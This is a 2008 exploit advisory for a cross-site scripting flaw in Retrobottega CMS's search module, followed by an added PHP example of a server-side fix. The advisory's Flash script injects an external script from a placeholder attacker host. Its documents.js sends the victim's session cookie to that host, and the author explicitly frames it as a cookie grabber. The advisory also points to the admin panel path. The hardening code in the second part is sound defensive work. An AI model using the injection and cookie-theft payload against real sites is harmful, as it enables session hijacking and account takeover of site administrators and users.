
retrobottega-xss.txt

Posted on 15 March 2008

Author: cybermilitant
Site: www.hacktime.org
Vendor's site: www.ilretrobottega.net
E-Mail: cybermilitant.ht@gmail.com
Vulnerability: Cross Site Scripting (XSS)

Description:
Retrobottega CMS is susceptible to a cross site scripting vulnerability. The search module is vulnerable and you can inject a simple JavaScript to execute XSS attacks. You only need to edit the script so that it redirects to your cookie stealer.

--->Thanks to: nexen<---

Flash script:
-------------------------------------------------------------------
var target:String = "art";
var lang:String = " it";
var nome_pagina:String = "RISULTATI_RICERCA";
var testo_da_ricercare:String = "<script src="http://[MYSITE]/documents.js"</script> ";
var invia:String = "CERCA nel sito";
getURL("[TARGET]/trovato.php", "_self", "POST");
-------------------------------------------------------------------

documents.js
-------------------------------------------------------------------
document.location='http://[MYSITE]/documents.php?c='+escape(document.cookie);
-------------------------------------------------------------------

In the end the classical cookie grabber...

The administrator board is here: http://[TARGET]/gestione/index.php
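A server-side fix for the search field described above, as an added example that is not from the advisory or from Retrobottega's code. The handler shape, the heading markup and the header values are assumptions, since the page does not show the source of trovato.php; only the field name testo_da_ricercare comes from the advisory's POST.

```php
<?php
// Added example, not Retrobottega code. Requires PHP 7.3+ for the
// array form of session_set_cookie_params().

/** Assumed vulnerable pattern: the search term is echoed unencoded. */
function render_results_vulnerable(string $term): string
{
    return '<h2>RISULTATI RICERCA: ' . $term . '</h2>';
}

/** Hardened: encode for the HTML context so markup in the term is shown as text. */
function render_results_hardened(string $term): string
{
    $safe = htmlspecialchars($term, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<h2>RISULTATI RICERCA: ' . $safe . '</h2>';
}

/** Defence in depth against the cookie-reading step; call before any output. */
function send_hardening_headers(): void
{
    // HttpOnly keeps the session cookie out of document.cookie.
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,  // assumption: the site is served over HTTPS
        'samesite' => 'Lax',
    ]);
    // Only same-origin script files may run; inline and third-party script is refused.
    header("Content-Security-Policy: default-src 'self'; script-src 'self'");
}

if (PHP_SAPI === 'cli') {
    // Constructed sample input with a placeholder host, for an offline comparison.
    $sample = '<script src="http://example.invalid/x.js"></script>';
    echo render_results_vulnerable($sample), "\n";
    echo render_results_hardened($sample), "\n";
} else {
    send_hardening_headers();
    session_start();
    // A field sent as an array (testo_da_ricercare[]=) is treated as empty.
    $raw = $_POST['testo_da_ricercare'] ?? '';
    echo render_results_hardened(is_string($raw) ? $raw : '');
}
```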

 
